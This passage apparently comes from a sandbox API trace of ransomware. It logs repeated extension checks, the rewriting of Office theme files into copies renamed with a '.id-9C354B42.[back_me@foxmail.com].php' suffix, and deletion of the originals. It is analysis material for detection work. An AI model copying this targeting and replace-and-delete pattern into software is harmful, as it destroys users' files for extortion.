lpString2=".GIF") returned 1 [0049.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0049.217] lstrlenW (lpString=".zip") returned 4 [0049.217] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0049.217] lstrlenW (lpString=".rar") returned 4 [0049.217] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0049.217] lstrlenW (lpString=".bz2") returned 4 [0049.217] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0049.217] lstrlenW (lpString=".7z") returned 3 [0049.217] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0049.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0049.217] lstrlenW (lpString=".dbf") returned 4 [0049.217] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0049.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0049.218] lstrlenW (lpString=".1cd") returned 4 [0049.218] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0049.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0049.218] lstrlenW (lpString=".jpg") returned 4 [0049.218] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0049.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0049.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0049.218] lstrlenW (lpString=".doc") returned 4 [0049.218] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0049.218] lstrlenW (lpString=".docx") returned 5 [0049.218] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0049.218] lstrlenW (lpString=".pdf") returned 4 [0049.218] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0049.218] lstrlenW (lpString=".xls") returned 4 [0049.218] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0049.218] lstrlenW (lpString=".xlsx") returned 5 [0049.218] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0049.218] lstrlenW (lpString=".ppt") returned 4 [0049.218] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0049.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0049.218] lstrlenW (lpString=".zip") returned 4 [0049.218] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0049.218] lstrlenW (lpString=".rar") returned 4 [0049.218] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0049.218] lstrlenW (lpString=".bz2") returned 4 [0049.218] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0049.218] lstrlenW (lpString=".7z") returned 3 [0049.218] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0049.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0049.218] lstrlenW (lpString=".dbf") returned 4 [0049.218] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0049.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0049.218] lstrlenW (lpString=".1cd") returned 4 [0049.219] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0049.219] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0049.219] lstrlenW (lpString=".jpg") returned 4 [0049.219] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0049.219] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0049.219] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0049.219] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0049.219] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=42453) returned 1 [0049.219] CloseHandle (hObject=0x200) returned 1 [0049.219] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png")) returned 0x20 [0049.219] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0049.219] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0049.219] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.220] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.220] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0049.220] GetLastError () returned 0x0 [0049.220] ReadFile (in: hFile=0x200, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0xa5d5, lpOverlapped=0x0) returned 1 [0049.222] WriteFile (in: hFile=0x198, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xa5e0, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xa5e0, lpOverlapped=0x0) returned 1 [0049.224] ReadFile (in: hFile=0x200, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.224] WriteFile (in: hFile=0x198, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0049.224] SetEndOfFile (hFile=0x198) returned 1 [0049.225] CloseHandle (hObject=0x198) returned 1 [0049.225] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.225] SetEndOfFile (hFile=0x200) returned 1 [0049.226] CloseHandle (hObject=0x200) returned 1 [0049.226] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0049.226] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png")) returned 1 [0049.226] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.226] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.226] lstrlenW (lpString=".doc") returned 4 [0049.226] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0049.226] lstrlenW (lpString=".docx") returned 5 [0049.226] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0049.226] lstrlenW (lpString=".pdf") returned 4 [0049.226] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0049.226] lstrlenW (lpString=".xls") returned 4 [0049.226] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0049.226] lstrlenW (lpString=".xlsx") returned 5 [0049.226] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0049.227] lstrlenW (lpString=".ppt") returned 4 [0049.227] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0049.227] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.227] lstrlenW (lpString=".zip") returned 4 [0049.227] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0049.227] lstrlenW (lpString=".rar") returned 4 [0049.227] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0049.227] lstrlenW (lpString=".bz2") returned 4 [0049.227] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0049.227] lstrlenW (lpString=".7z") returned 3 [0049.227] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0049.227] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.227] lstrlenW (lpString=".dbf") returned 4 [0049.227] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0049.227] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.227] lstrlenW (lpString=".1cd") returned 4 [0049.227] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0049.227] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.227] lstrlenW (lpString=".jpg") returned 4 [0049.227] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0049.227] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.227] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.227] lstrlenW (lpString=".doc") returned 4 [0049.227] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0049.227] lstrlenW (lpString=".docx") returned 5 [0049.227] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0049.227] lstrlenW (lpString=".pdf") returned 4 [0049.227] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0049.227] lstrlenW (lpString=".xls") returned 4 [0049.227] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0049.227] lstrlenW (lpString=".xlsx") returned 5 [0049.227] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0049.227] lstrlenW (lpString=".ppt") returned 4 [0049.227] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0049.228] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.228] lstrlenW (lpString=".zip") returned 4 [0049.228] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0049.228] lstrlenW (lpString=".rar") returned 4 [0049.228] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0049.228] lstrlenW (lpString=".bz2") returned 4 [0049.228] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0049.228] lstrlenW (lpString=".7z") returned 3 [0049.228] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0049.228] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.228] lstrlenW (lpString=".dbf") returned 4 [0049.228] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0049.228] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.228] lstrlenW (lpString=".1cd") returned 4 [0049.228] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0049.228] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.228] lstrlenW (lpString=".jpg") returned 4 [0049.228] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0049.228] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0049.228] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0049.228] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0049.229] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=1571) returned 1 [0049.229] CloseHandle (hObject=0x200) returned 1 [0049.229] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif")) returned 0x20 [0049.229] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0049.229] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0049.229] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.229] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.230] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0049.231] GetLastError () returned 0x0 [0049.231] ReadFile (in: hFile=0x200, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x623, lpOverlapped=0x0) returned 1 [0049.233] WriteFile (in: hFile=0x210, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x630, lpOverlapped=0x0) returned 1 [0049.234] ReadFile (in: hFile=0x200, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.234] WriteFile (in: hFile=0x210, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xea, lpOverlapped=0x0) returned 1 [0049.234] SetEndOfFile (hFile=0x210) returned 1 [0049.234] CloseHandle (hObject=0x210) returned 1 [0049.234] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.234] SetEndOfFile (hFile=0x200) returned 1 [0049.235] CloseHandle (hObject=0x200) returned 1 [0049.235] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0049.238] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif")) returned 1 [0049.238] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0049.238] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0049.238] lstrlenW (lpString=".doc") returned 4 [0049.238] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0049.238] lstrlenW (lpString=".docx") returned 5 [0049.238] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0049.238] lstrlenW (lpString=".pdf") returned 4 [0049.238] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0049.238] lstrlenW (lpString=".xls") returned 4 [0049.238] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0049.238] lstrlenW (lpString=".xlsx") returned 5 [0049.238] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0049.238] lstrlenW (lpString=".ppt") returned 4 [0049.238] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0049.238] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0049.238] lstrlenW (lpString=".zip") returned 4 [0049.238] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0049.238] lstrlenW (lpString=".rar") returned 4 [0049.238] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0049.238] lstrlenW (lpString=".bz2") returned 4 [0049.239] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0049.239] lstrlenW (lpString=".7z") returned 3 [0049.239] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0049.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0049.239] lstrlenW (lpString=".dbf") returned 4 [0049.239] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0049.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0049.239] lstrlenW (lpString=".1cd") returned 4 [0049.239] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0049.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0049.239] lstrlenW (lpString=".jpg") returned 4 [0049.239] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0049.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0049.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0049.239] lstrlenW (lpString=".doc") returned 4 [0049.239] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0049.239] lstrlenW (lpString=".docx") returned 5 [0049.239] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0049.239] lstrlenW (lpString=".pdf") returned 4 [0049.239] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0049.239] lstrlenW (lpString=".xls") returned 4 [0049.239] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0049.239] lstrlenW (lpString=".xlsx") returned 5 [0049.239] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0049.239] lstrlenW (lpString=".ppt") returned 4 [0049.239] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0049.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0049.239] lstrlenW (lpString=".zip") returned 4 [0049.239] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0049.239] lstrlenW (lpString=".rar") returned 4 [0049.239] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0049.239] lstrlenW (lpString=".bz2") returned 4 [0049.239] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0049.240] lstrlenW (lpString=".7z") returned 3 [0049.240] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0049.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0049.240] lstrlenW (lpString=".dbf") returned 4 [0049.240] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0049.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0049.240] lstrlenW (lpString=".1cd") returned 4 [0049.240] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0049.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0049.240] lstrlenW (lpString=".jpg") returned 4 [0049.240] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0049.240] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0049.240] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0049.240] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0049.449] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=30170) returned 1 [0049.449] CloseHandle (hObject=0x1a4) returned 1 [0049.450] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png")) returned 0x20 [0049.450] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0049.450] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0049.450] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.450] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.450] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0049.450] GetLastError () returned 0x0 [0049.450] ReadFile (in: hFile=0x1a4, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x75da, lpOverlapped=0x0) returned 1 [0049.452] WriteFile (in: hFile=0x210, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x75e0, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x75e0, lpOverlapped=0x0) returned 1 [0049.453] ReadFile (in: hFile=0x1a4, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.453] WriteFile (in: hFile=0x210, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0049.454] SetEndOfFile (hFile=0x210) returned 1 [0049.454] CloseHandle (hObject=0x210) returned 1 [0049.454] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.454] SetEndOfFile (hFile=0x1a4) returned 1 [0049.455] CloseHandle (hObject=0x1a4) returned 1 [0049.455] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0049.455] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png")) returned 1 [0049.455] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0049.455] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0049.455] lstrlenW (lpString=".doc") returned 4 [0049.456] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0049.456] lstrlenW (lpString=".docx") returned 5 [0049.456] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0049.456] lstrlenW (lpString=".pdf") returned 4 [0049.456] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0049.456] lstrlenW (lpString=".xls") returned 4 [0049.456] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0049.456] lstrlenW (lpString=".xlsx") returned 5 [0049.456] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0049.456] lstrlenW (lpString=".ppt") returned 4 [0049.456] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0049.456] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0049.456] lstrlenW (lpString=".zip") returned 4 